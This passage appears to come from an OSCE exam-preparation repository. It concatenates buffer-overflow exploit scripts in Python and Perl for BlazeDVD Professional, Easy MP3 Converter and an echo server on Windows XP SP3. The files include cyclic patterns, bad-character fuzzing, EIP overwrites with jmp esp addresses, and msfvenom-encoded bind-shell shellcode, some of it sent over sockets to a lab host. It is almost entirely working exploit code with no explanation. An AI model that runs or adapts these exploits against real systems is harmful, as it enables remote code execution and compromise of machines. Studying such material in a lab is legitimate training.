"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | buffer += "C"*100 16 | 17 | file.write(buffer) 18 | 19 | file.close() 20 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_overwrite.plf: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_eip_overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_eip_overwrite.plf", "wb") 4 | 5 | buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A" 6 | 7 | file.write(buffer) 8 | 9 | file.close() 10 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt1.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt1.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_shellcode_attempt1.plf", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x1a' -f c 6 | 7 | shellcode = ("\xba\xf7\x60\x07\x67\xda\xcf\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 8 | "\x53\x83\xee\xfc\x31\x56\x0e\x03\xa1\x6e\xe5\x92\xb1\x87\x6b" 9 | "\x5c\x49\x58\x0c\xd4\xac\x69\x0c\x82\xa5\xda\xbc\xc0\xeb\xd6" 10 | "\x37\x84\x1f\x6c\x35\x01\x10\xc5\xf0\x77\x1f\xd6\xa9\x44\x3e" 11 | "\x54\xb0\x98\xe0\x65\x7b\xed\xe1\xa2\x66\x1c\xb3\x7b\xec\xb3" 12 | "\x23\x0f\xb8\x0f\xc8\x43\x2c\x08\x2d\x13\x4f\x39\xe0\x2f\x16" 13 | "\x99\x03\xe3\x22\x90\x1b\xe0\x0f\x6a\x90\xd2\xe4\x6d\x70\x2b" 14 | "\x04\xc1\xbd\x83\xf7\x1b\xfa\x24\xe8\x69\xf2\x56\x95\x69\xc1" 15 | "\x25\x41\xff\xd1\x8e\x02\xa7\x3d\x2e\xc6\x3e\xb6\x3c\xa3\x35" 16 | "\x90\x20\x32\x99\xab\x5d\xbf\x1c\x7b\xd4\xfb\x3a\x5f\xbc\x58" 17 | "\x22\xc6\x18\x0e\x5b\x18\xc3\xef\xf9\x53\xee\xe4\x73\x3e\x67" 18 | "\xc8\xb9\xc0\x77\x46\xc9\xb3\x45\xc9\x61\x5b\xe6\x82\xaf\x9c" 19 | "\x09\xb9\x08\x32\xf4\x42\x69\x1b\x33\x16\x39\x33\x92\x17\xd2" 20 | "\xc3\x1b\xc2\x4f\xcb\xba\xbd\x6d\x36\x7c\x6e\x32\x98\x15\x64" 21 | "\xbd\xc7\x06\x87\x17\x60\xae\x7a\x98\x9f\x73\xf2\x7e\xf5\x9b" 22 | "\x52\x28\x61\x5e\x81\xe1\x16\xa1\xe3\x59\xb0\xea\xe5\x5e\xbf" 23 | "\xea\x23\xc9\x57\x61\x20\xcd\x46\x76\x6d\x65\x1f\xe1\xfb\xe4" 24 | "\x52\x93\xfc\x2c\x04\x30\x6e\xab\xd4\x3f\x93\x64\x83\x68\x65" 25 | "\x7d\x41\x85\xdc\xd7\x77\x54\xb8\x10\x33\x83\x79\x9e\xba\x46" 26 | "\xc5\x84\xac\x9e\xc6\x80\x98\x4e\x91\x5e\x76\x29\x4b\x11\x20" 27 | "\xe3\x20\xfb\xa4\x72\x0b\x3c\xb2\x7a\x46\xca\x5a\xca\x3f\x8b" 28 | "\x65\xe3\xd7\x1b\x1e\x19\x48\xe3\xf5\x99\x78\xae\x57\x8b\x10" 29 | "\x77\x02\x89\x7c\x88\xf9\xce\x78\x0b\x0b\xaf\x7e\x13\x7e\xaa" 30 | "\x3b\x93\x93\xc6\x54\x76\x93\x75\x54\x53") 31 | 32 | buffer = "A"*260 33 | buffer += shellcode 34 | buffer += "C"*500 35 | 36 | file.write(buffer) 37 | 38 | file.close() 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt2.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt2.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_shellcode_attempt2.plf", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x1a' -f c 6 | 7 | shellcode = ("\xba\xf7\x60\x07\x67\xda\xcf\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 8 | "\x53\x83\xee\xfc\x31\x56\x0e\x03\xa1\x6e\xe5\x92\xb1\x87\x6b" 9 | "\x5c\x49\x58\x0c\xd4\xac\x69\x0c\x82\xa5\xda\xbc\xc0\xeb\xd6" 10 | "\x37\x84\x1f\x6c\x35\x01\x10\xc5\xf0\x77\x1f\xd6\xa9\x44\x3e" 11 | "\x54\xb0\x98\xe0\x65\x7b\xed\xe1\xa2\x66\x1c\xb3\x7b\xec\xb3" 12 | "\x23\x0f\xb8\x0f\xc8\x43\x2c\x08\x2d\x13\x4f\x39\xe0\x2f\x16" 13 | "\x99\x03\xe3\x22\x90\x1b\xe0\x0f\x6a\x90\xd2\xe4\x6d\x70\x2b" 14 | "\x04\xc1\xbd\x83\xf7\x1b\xfa\x24\xe8\x69\xf2\x56\x95\x69\xc1" 15 | "\x25\x41\xff\xd1\x8e\x02\xa7\x3d\x2e\xc6\x3e\xb6\x3c\xa3\x35" 16 | "\x90\x20\x32\x99\xab\x5d\xbf\x1c\x7b\xd4\xfb\x3a\x5f\xbc\x58" 17 | "\x22\xc6\x18\x0e\x5b\x18\xc3\xef\xf9\x53\xee\xe4\x73\x3e\x67" 18 | "\xc8\xb9\xc0\x77\x46\xc9\xb3\x45\xc9\x61\x5b\xe6\x82\xaf\x9c" 19 | "\x09\xb9\x08\x32\xf4\x42\x69\x1b\x33\x16\x39\x33\x92\x17\xd2" 20 | "\xc3\x1b\xc2\x4f\xcb\xba\xbd\x6d\x36\x7c\x6e\x32\x98\x15\x64" 21 | "\xbd\xc7\x06\x87\x17\x60\xae\x7a\x98\x9f\x73\xf2\x7e\xf5\x9b" 22 | "\x52\x28\x61\x5e\x81\xe1\x16\xa1\xe3\x59\xb0\xea\xe5\x5e\xbf" 23 | "\xea\x23\xc9\x57\x61\x20\xcd\x46\x76\x6d\x65\x1f\xe1\xfb\xe4" 24 | "\x52\x93\xfc\x2c\x04\x30\x6e\xab\xd4\x3f\x93\x64\x83\x68\x65" 25 | "\x7d\x41\x85\xdc\xd7\x77\x54\xb8\x10\x33\x83\x79\x9e\xba\x46" 26 | "\xc5\x84\xac\x9e\xc6\x80\x98\x4e\x91\x5e\x76\x29\x4b\x11\x20" 27 | "\xe3\x20\xfb\xa4\x72\x0b\x3c\xb2\x7a\x46\xca\x5a\xca\x3f\x8b" 28 | "\x65\xe3\xd7\x1b\x1e\x19\x48\xe3\xf5\x99\x78\xae\x57\x8b\x10" 29 | "\x77\x02\x89\x7c\x88\xf9\xce\x78\x0b\x0b\xaf\x7e\x13\x7e\xaa" 30 | "\x3b\x93\x93\xc6\x54\x76\x93\x75\x54\x53") 31 | 32 | buffer = "A"*260 33 | buffer += "\x64\xc3\x78\x7e" 34 | buffer += "\x90"*10 35 | buffer += shellcode 36 | buffer += "C"*500 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt3.plf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt3.plf -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/BlazeDVDProfessional/dvd_shellcode_attempt3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("dvd_shellcode_attempt3.plf", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x1a' -f c 6 | 7 | shellcode = ("\xba\xf7\x60\x07\x67\xda\xcf\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 8 | "\x53\x83\xee\xfc\x31\x56\x0e\x03\xa1\x6e\xe5\x92\xb1\x87\x6b" 9 | "\x5c\x49\x58\x0c\xd4\xac\x69\x0c\x82\xa5\xda\xbc\xc0\xeb\xd6" 10 | "\x37\x84\x1f\x6c\x35\x01\x10\xc5\xf0\x77\x1f\xd6\xa9\x44\x3e" 11 | "\x54\xb0\x98\xe0\x65\x7b\xed\xe1\xa2\x66\x1c\xb3\x7b\xec\xb3" 12 | "\x23\x0f\xb8\x0f\xc8\x43\x2c\x08\x2d\x13\x4f\x39\xe0\x2f\x16" 13 | "\x99\x03\xe3\x22\x90\x1b\xe0\x0f\x6a\x90\xd2\xe4\x6d\x70\x2b" 14 | "\x04\xc1\xbd\x83\xf7\x1b\xfa\x24\xe8\x69\xf2\x56\x95\x69\xc1" 15 | "\x25\x41\xff\xd1\x8e\x02\xa7\x3d\x2e\xc6\x3e\xb6\x3c\xa3\x35" 16 | "\x90\x20\x32\x99\xab\x5d\xbf\x1c\x7b\xd4\xfb\x3a\x5f\xbc\x58" 17 | "\x22\xc6\x18\x0e\x5b\x18\xc3\xef\xf9\x53\xee\xe4\x73\x3e\x67" 18 | "\xc8\xb9\xc0\x77\x46\xc9\xb3\x45\xc9\x61\x5b\xe6\x82\xaf\x9c" 19 | "\x09\xb9\x08\x32\xf4\x42\x69\x1b\x33\x16\x39\x33\x92\x17\xd2" 20 | "\xc3\x1b\xc2\x4f\xcb\xba\xbd\x6d\x36\x7c\x6e\x32\x98\x15\x64" 21 | "\xbd\xc7\x06\x87\x17\x60\xae\x7a\x98\x9f\x73\xf2\x7e\xf5\x9b" 22 | "\x52\x28\x61\x5e\x81\xe1\x16\xa1\xe3\x59\xb0\xea\xe5\x5e\xbf" 23 | "\xea\x23\xc9\x57\x61\x20\xcd\x46\x76\x6d\x65\x1f\xe1\xfb\xe4" 24 | "\x52\x93\xfc\x2c\x04\x30\x6e\xab\xd4\x3f\x93\x64\x83\x68\x65" 25 | "\x7d\x41\x85\xdc\xd7\x77\x54\xb8\x10\x33\x83\x79\x9e\xba\x46" 26 | "\xc5\x84\xac\x9e\xc6\x80\x98\x4e\x91\x5e\x76\x29\x4b\x11\x20" 27 | "\xe3\x20\xfb\xa4\x72\x0b\x3c\xb2\x7a\x46\xca\x5a\xca\x3f\x8b" 28 | "\x65\xe3\xd7\x1b\x1e\x19\x48\xe3\xf5\x99\x78\xae\x57\x8b\x10" 29 | "\x77\x02\x89\x7c\x88\xf9\xce\x78\x0b\x0b\xaf\x7e\x13\x7e\xaa" 30 | "\x3b\x93\x93\xc6\x54\x76\x93\x75\x54\x53") 31 | 32 | buffer = "A"*260 33 | buffer += "\x53\x93\x42\x7e" 34 | buffer += "\x90"*60 35 | buffer += shellcode 36 | buffer += "C"*500 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-crash.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | 5 | my $buffer = "\x41" x $buffsize; # build the exploit buffer 6 | 7 | # write the exploit buffer to file 8 | my $file = "asx2mp3.m3u"; 9 | open(FILE, ">$file"); 10 | print FILE $buffer; 11 | close(FILE); 12 | print "Exploit file created [" . $file . "]\n"; 13 | print "Buffer size: " . length($buffer). "\n"; -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-determine-eip.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | my $As = "\x41" x ($buffsize / 5); 5 | my $Bs = "\x42" x ($buffsize / 5); 6 | my $Cs = "\x43" x ($buffsize / 5); 7 | my $Ds = "\x44" x ($buffsize / 5); 8 | my $Es = "\x45" x ($buffsize / 5); 9 | 10 | my $buffer = $As.$Bs.$Cs.$Ds.$Es; # build the exploit buffer 11 | 12 | # write the exploit buffer to file 13 | my $file = "asx2mp3.m3u"; 14 | open(FILE, ">$file"); 15 | print FILE $buffer; 16 | close(FILE); 17 | print "Exploit file created [" . $file . "]\n"; 18 | print "Buffer size: " . length($buffer). "\n"; 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-overwrite-eip-jmp-esp.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | 5 | my $junk = "\x41" x 35039; # offset to eip overwrite 6 | my $eip = pack('V', 0x01AAF23A); # jmp esp C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll 7 | my $sploit = $junk.$eip; # build the exploit portion of the buffer 8 | my $fill = "\x43" x ($buffsize - length($sploit)); # fill the remainder of the buffer 9 | my $buffer = $sploit.$fill; # build the final buffer 10 | 11 | # write the exploit buffer to file 12 | my $file = "asx2mp3.m3u"; 13 | open(FILE, ">$file"); 14 | print FILE $buffer; 15 | close(FILE); 16 | print "Exploit file created [" . $file . "]\n"; 17 | print "Buffer size: " . length($buffer). "\n"; 18 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/EasyMP3Converter/easymp3-ss-overwrite-eip.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | my $buffsize = 50000; # sets buffer size for consistent sized payload 4 | 5 | my $junk = "\x41" x 35039; # offset to eip overwrite 6 | my $eip = "\x42" x 4; # overwrite eip 7 | my $sploit = $junk.$eip; # build the exploit portion of the buffer 8 | my $fill = "\x43" x ($buffsize - length($sploit)); # fill the remainder of the buffer 9 | my $buffer = $sploit.$fill; # build the final buffer 10 | 11 | # write the exploit buffer to file 12 | my $file = "asx2mp3.m3u"; 13 | open(FILE, ">$file"); 14 | print FILE $buffer; 15 | close(FILE); 16 | print "Exploit file created [" . $file . "]\n"; 17 | print "Buffer size: " . length($buffer). "\n"; 18 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server/echo_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*2036 10 | 11 | sock.send(buffer) 12 | 13 | sock.close() 14 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server/echo_server_shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 10 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 11 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 12 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 13 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 14 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 15 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 16 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 17 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 18 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 19 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 20 | "\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40" 21 | "\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" 22 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" 23 | "\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97" 24 | "\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57" 25 | "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" 26 | "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" 27 | "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0" 28 | "\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5" 29 | "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb" 30 | "\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") 31 | 32 | 33 | buffer = "\x90"*36 34 | buffer += shellcode 35 | buffer += "\x90"*(1036-36-len(shellcode)) 36 | buffer += "\x50\xf7\x22\x00" 37 | 38 | sock.send(buffer) 39 | 40 | sock.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_3/badchars.txt: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_3/echo_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*1100 10 | buffer += ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 11 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 13 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 14 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 15 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 16 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xde\xdf" 17 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe") 18 | buffer += "B" * 400 19 | 20 | sock.send(buffer) 21 | 22 | sock.close() 23 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_3/echo_server_shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | shellcode = ("\xbf\x6d\x30\xa5\xa3\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" 10 | "\x53\x31\x78\x12\x83\xe8\xfc\x03\x15\x3e\x47\x56\x19\xd6\x05" 11 | "\x99\xe1\x27\x6a\x13\x04\x16\xaa\x47\x4d\x09\x1a\x03\x03\xa6" 12 | "\xd1\x41\xb7\x3d\x97\x4d\xb8\xf6\x12\xa8\xf7\x07\x0e\x88\x96" 13 | "\x8b\x4d\xdd\x78\xb5\x9d\x10\x79\xf2\xc0\xd9\x2b\xab\x8f\x4c" 14 | "\xdb\xd8\xda\x4c\x50\x92\xcb\xd4\x85\x63\xed\xf5\x18\xff\xb4" 15 | "\xd5\x9b\x2c\xcd\x5f\x83\x31\xe8\x16\x38\x81\x86\xa8\xe8\xdb" 16 | "\x67\x06\xd5\xd3\x95\x56\x12\xd3\x45\x2d\x6a\x27\xfb\x36\xa9" 17 | "\x55\x27\xb2\x29\xfd\xac\x64\x95\xff\x61\xf2\x5e\xf3\xce\x70" 18 | "\x38\x10\xd0\x55\x33\x2c\x59\x58\x93\xa4\x19\x7f\x37\xec\xfa" 19 | "\x1e\x6e\x48\xac\x1f\x70\x33\x11\xba\xfb\xde\x46\xb7\xa6\xb6" 20 | "\xab\xfa\x58\x47\xa4\x8d\x2b\x75\x6b\x26\xa3\x35\xe4\xe0\x34" 21 | "\x39\xdf\x55\xaa\xc4\xe0\xa5\xe3\x02\xb4\xf5\x9b\xa3\xb5\x9d" 22 | "\x5b\x4b\x60\x0b\x53\xea\xdb\x2e\x9e\x4c\x8c\xee\x30\x25\xc6" 23 | "\xe0\x6f\x55\xe9\x2a\x18\xfe\x14\xd5\x37\xa3\x91\x33\x5d\x4b" 24 | 